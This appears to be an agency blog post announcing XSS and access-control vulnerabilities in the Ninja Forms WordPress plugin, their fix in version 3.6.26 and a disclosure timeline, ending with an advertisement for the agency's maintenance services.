Ninja Forms for WordPress: Multiple high-level security vulnerabilities

There is important news for WordPress website operators using the Ninja Forms plugin. In this article, we discuss the latest developments surrounding the security of this popular plugin and inform you of the necessary measures you should take to protect your website. Three security vulnerabilities were recently discovered in the widely used Ninja Forms plugin for WordPress. These vulnerabilities could allow attackers to access protected data that they normally would not be able to reach. Fortunately, the developers reacted quickly and made a secured version of the plugin available.

The security gaps in detail

The three identified vulnerabilities pose a serious threat to websites using the Ninja Forms plugin. If attackers successfully exploit one of these vulnerabilities, they could access protected information via a so-called XSS attack. This is due to inadequate verification, which allows attackers to manipulate website requests and place a payload containing malicious code. It is important to note that the XSS vulnerability is not persistent. In addition to this vulnerability, there is a possibility that unauthorized parties could access form submissions due to faulty access control. The threat levels of these two vulnerabilities have not yet been officially classified.

The solution: the patch

The developers of the Ninja Forms plugin responded quickly to the discovery of these security vulnerabilities. They stated that the security issues were fixed in version 3.6.26 of the plugin. It is strongly recommended that all users of the plugin update to this version as soon as possible to protect their websites.

About the Ninja Forms plugin

The Ninja Forms plugin is a popular tool for WordPress website administrators. It allows you to create forms for website visitors and currently has over 800,000 active installations. It is known as one of the most popular form builder plugins in WordPress and is developed by Saturday Drive. This plugin is a free form builder for WordPress that allows us to create almost any type of form we can imagine. It ranges from simple contact forms to event registrations, file uploads, payments and more.

Timeline of events

On June 22, 2023, the security gaps were discovered and the plug-in provider was informed. On July 4, 2023, Ninja Forms version 3.6.26 was released to address the reported issue. On July 25, 2023, the security vulnerabilities were discovered Patchstack vulnerability database recorded. The security gap is therefore publicly known and a patch is available. If you use Ninja Forms on your WordPress website, you should urgently check whether a corresponding patch is installed.

Conclusion

In today’s digital world, it is essential to stay up to date with the latest security developments. The discovery of these vulnerabilities in the Ninja Forms plugin highlights the need to always use the latest versions of plugins and other software tools. By updating to the latest version of the Ninja Forms plugin, you can ensure that your website is protected from these specific threats. Our agency offers WordPress maintenance services and security monitoring for WordPress. If you don’t want to be responsible for constant monitoring of WordPress or your plugins yourself, leave this work to us. Learn more about our WordPress maintenance services here.